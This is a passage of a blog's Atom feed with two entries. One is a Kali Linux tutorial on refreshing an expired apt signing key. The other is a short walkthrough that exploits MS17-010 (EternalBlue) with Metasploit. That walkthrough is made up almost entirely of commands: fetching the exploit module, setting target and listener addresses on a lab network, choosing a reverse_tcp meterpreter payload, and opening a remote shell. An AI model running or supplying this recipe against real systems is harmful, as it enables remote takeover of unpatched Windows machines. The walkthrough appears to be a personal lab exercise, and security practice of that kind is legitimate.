<content type="html"><![CDATA[<h3 id="更换apt源后显示GPG错误-签名无效等"><a href="#更换apt源后显示GPG错误-签名无效等" class="headerlink" title="更换apt源后显示GPG错误 签名无效等"></a>GPG error, invalid signature, etc. after changing the apt source</h3><h5 id="问题描述"><a href="#问题描述" class="headerlink" title="问题描述"></a>Problem</h5><p>Kali Linux had gone too long without updates and threw the GPG error KEYEXPIRED 1425567400. On checking, the source resolved fine and the deb lines did not conflict; the signing key had simply expired!<img src="https://s1.ax2x.com/2018/02/06/vQvfJ.png" alt=""></p><a id="more"></a><h5 id="解决方法"><a href="#解决方法" class="headerlink" title="解决方法"></a>Solution</h5><p>There are several ways to refresh the key (any one of them will do):</p><pre><code>1. # apt-key adv --keyserver keys.gnupg.net --recv-keys ED444FF07D8D0BF6</code></pre><hr><pre><code>2. # wget -q -O - archive.kali.org/archive-key.asc | apt-key add -</code></pre><hr><pre><code>3. # gpg --keyserver hkp://pgpkeys.mit.edu --recv-key ED444FF07D8D0BF6
   # gpg -a --export ED444FF07D8D0BF6 | sudo apt-key add -</code></pre><hr><pre><code>4. # wget https://http.kali.org/kali/pool/ ... ring_2018.1_all.deb
   # apt install ./kali-archive-keyring_2018.1_all.deb</code></pre><p>Once the key has been refreshed, update / upgrade work normally again.</p><p>Then run<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get update</span><br></pre></td></tr></table></figure></p><p>and you are done.<br><img src="https://s1.ax2x.com/2018/02/06/vQhal.png" alt="解决"></p>]]></content>
<summary type="html">
<h3 id="更换apt源后显示GPG错误-签名无效等"><a href="#更换apt源后显示GPG错误-签名无效等" class="headerlink" title="更换apt源后显示GPG错误 签名无效等"></a>GPG error, invalid signature, etc. after changing the apt source</h3><h5 id="问题描述"><a href="#问题描述" class="headerlink" title="问题描述"></a>Problem</h5><p>Kali Linux had gone too long without updates and threw the GPG error KEYEXPIRED 1425567400. On checking, the source resolved fine and the deb lines did not conflict; the signing key had simply expired!<img src="https://s1.ax2x.com/2018/02/06/vQvfJ.png" alt=""></p>
</summary>
<category term="kali" scheme="http://fdrag0n.github.io/categories/kali/"/>
<category term="kali" scheme="http://fdrag0n.github.io/tags/kali/"/>
</entry>
<entry>
<title>A messy first go at exploiting MS17-010</title>
<link href="http://fdrag0n.github.io/2018/01/18/%E7%9E%8E%E6%90%9E%E7%9A%84%E4%B8%80%E6%AC%A1ms17-0100%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/"/>
<id>http://fdrag0n.github.io/2018/01/18/瞎搞的一次ms17-0100漏洞利用/</id>
<published>2018-01-18T02:22:42.000Z</published>
<updated>2019-08-19T03:01:29.009Z</updated>
<content type="html"><![CDATA[<h1 id="MS17-010"><a href="#MS17-010" class="headerlink" title="MS17-010"></a>MS17-010</h1><h2 id="前提条件:"><a href="#前提条件:" class="headerlink" title="前提条件:"></a>Prerequisites:</h2><p><strong>gem install ruby_smb</strong><br>—-install the ruby_smb module<br><strong>msfupdate</strong><br>—-update msf<br><strong>msfconsole -qx "use<br>exploit/windows/smb/ms17_010_eternalblue"</strong><br>—-start msf and load the module</p><a id="more"></a><hr><h2 id="部署环境:"><a href="#部署环境:" class="headerlink" title="部署环境:"></a>Setting up:</h2><ul><li><strong>msfconsole</strong> </li><li><strong>wget <a href="https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb" target="_blank" rel="noopener">https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb</a></strong> </li><li><strong>cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb</strong> </li></ul><hr><h2 id="开始攻击"><a href="#开始攻击" class="headerlink" title="开始攻击:"></a>Start the attack:</h2><ul><li><strong>msfconsole</strong></li><li><strong>use exploit/windows/smb/ms17_010_eternalblue</strong> </li><li><strong>set rhost 192.168.21.128</strong></li><li><strong>set lhost 192.168.21.131</strong></li><li><strong>set payload windows/x64/meterpreter/reverse_tcp</strong></li><li><strong>exploit</strong> </li><li><strong>shell</strong></li></ul>]]></content>
<summary type="html">
<h1 id="MS17-010"><a href="#MS17-010" class="headerlink" title="MS17-010"></a>MS17-010</h1><h2 id="前提条件:"><a href="#前提条件:" class="headerlink" title="前提条件:"></a>Prerequisites:</h2><p><strong>gem install ruby_smb</strong><br>—-install the ruby_smb module<br><strong>msfupdate</strong><br>—-update msf<br><strong>msfconsole -qx "use<br>exploit/windows/smb/ms17_010_eternalblue"</strong><br>—-start msf and load the module</p>
</summary>
</entry>
</feed>